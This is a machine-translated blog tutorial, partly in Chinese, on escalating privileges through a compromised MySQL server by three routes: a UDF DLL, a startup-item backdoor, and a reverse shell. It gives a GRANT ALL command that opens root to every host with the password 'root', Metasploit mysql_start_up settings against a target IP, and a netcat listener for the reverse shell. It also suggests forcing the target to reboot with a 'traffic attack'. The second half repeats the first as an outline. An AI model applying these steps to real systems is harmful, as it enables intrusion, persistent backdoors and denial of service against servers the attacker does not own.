Privilege Escalation: Mysql Database. (UDF || Start Items || Bounce)

Privilege Escalation: Mysql database.

Privilege escalation is referred to as privilege escalation . Since the operating system is a multi-user operating system , users have permission control . For example, the permissions obtained through Web vulnerabilities are Web process permissions. Often, Web services are started with an account with very low permissions. Therefore, some operations through the Webshell will be restricted, which requires it to be elevated to administrative or even System privileges. Privileges are usually escalated through operating system vulnerabilities or misconfigurations of the operating system, or through third-party software services, such as database or FTP software vulnerabilities.

Disclaimer:

It is strictly forbidden to use the technology mentioned in this article to carry out illegal attacks, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.

Elevation of power thought:

In the case of using the system overflow vulnerability to no avail, you can use the database to escalate privileges, but you need to know the prerequisites for database privilege escalation: the server opens the database service and obtains the password of the user with the highest authority . In addition to the Access database, other databases basically have the possibility of database privilege escalation.

Process: service probe - information collection - rights enhancement - access to permissions

Mysql database privilege escalation:

The privilege escalation means that we already have a Trojan horse or other methods to connect to the directory of the web site.

数据库的默认端口信息：

1、MySql数据库 ，默认端口是: 3306；

2、Oracle数据库 ，默认端口号为：1521；

3、Sql Server数据库 ，默认端口号为：1433；

4、DB2数据库， 默认端口号为：5000；

5、PostgreSQL数据库， 默认端口号为：5432；

6、国产的DM达梦数据库， 默认端口号为：5236;

7、Redis数据库，默认端口号：6379；

8、Memcached数据库，默认端口号：11211；

9、MongoDB数据库，默认端口号：27017；

UDF privilege escalation:

The first step: service probe. (port)

The second step: information collection.

(1) Read the website database configuration file ( understand its naming rules and search skills )

查看数据库配置文件的关键字：

sql，data，inc，config，conn，database，common，include.....

(2) Read database storage or backup files ( understand its database storage format and corresponding content )

Step 3: Lift the right to use.

提权的第一步要知道数据库的版本号:

（1）mysql<5.1    导出目录 c:/windows 或 system32

（2）mysql=>5.1   导出安装目录/lib/plugin/

(1) View the installation directory of the database

select @@basedir;

(2) Copy the installation directory, access and click the lib file.

(3) Click to create the plugin directory. ( Because mysql=>5.1, this directory needs to be created. )

(4) Copy the URL of the plugin directory.

(5) Then click Install DLL, and then click the command you want to execute.

(6) Improve permissions and add administrators. ( Because I added it twice here, the returned result already exists. )

Start item privilege escalation:

导出自定义可执行文件到启动目录配合重启执行
将创建好的后门或执行文件进行服务器启动项写入，配合重启执行！

Step 1: Open external connection.

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;

Step 2: Use msf to escalate the database .

msfconsole

use exploit/windows/mysql/mysql_start_up        //使用外连模块.

show options            //查看需要配置的模块

set rhosts 192.168.0.102            //设置目标主机 IP 地址.

set username root                     //设置数据库用户名.

set password root                    //设置数据库的密码.

run            //执行模块上传.

Step 3: The target host restarts, and the backdoor will be enabled. ( How to restart the target host, you can use traffic attack. )

Rebound privilege escalation:

The first step: listening on the attack aircraft

nc -l -p 5577

Step 2: Upload the Mysql privilege escalation tool for later access.

Step 3: Create a bounce function.

Step 4: Execute monitoring .

Step 5: Go back to kali to check that it has returned successfully.

Solve the problem of installing DLL: https://www.cnblogs.com/awrrays/p/11371522.html

Privilege Escalation: Mysql Database. (UDF || Start Items || Bounce)

Privilege Escalation: Mysql database.

Table of contents:

Disclaimer:

It is strictly forbidden to use the technology mentioned in this article to carry out illegal attacks, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.

Elevation of power thought:

Process: service probe - information collection - rights enhancement - access to permissions

Mysql database privilege escalation:

The privilege escalation means that we already have a Trojan horse or other methods to connect to the directory of the web site.

UDF privilege escalation:

The first step: service probe. (port)

The second step: information collection.

(1) Read the website database configuration file ( understand its naming rules and search skills )

(2) Read database storage or backup files ( understand its database storage format and corresponding content )

Step 3: Lift the right to use.

(1) View the installation directory of the database

(2) Copy the installation directory, access and click the lib file.

(3) Click to create the plugin directory. ( Because mysql=>5.1, this directory needs to be created. )

(4) Copy the URL of the plugin directory.

(5) Then click Install DLL, and then click the command you want to execute.

(6) Improve permissions and add administrators. ( Because I added it twice here, the returned result already exists. )

Start item privilege escalation:

Step 1: Open external connection.

Step 2: Use msf to escalate the database .

Step 3: The target host restarts, and the backdoor will be enabled. ( How to restart the target host, you can use traffic attack. )

Rebound privilege escalation:

The first step: listening on the attack aircraft

Step 2: Upload the Mysql privilege escalation tool for later access.

Step 3: Create a bounce function.

Step 4: Execute monitoring .

Step 5: Go back to kali to check that it has returned successfully.

Guess you like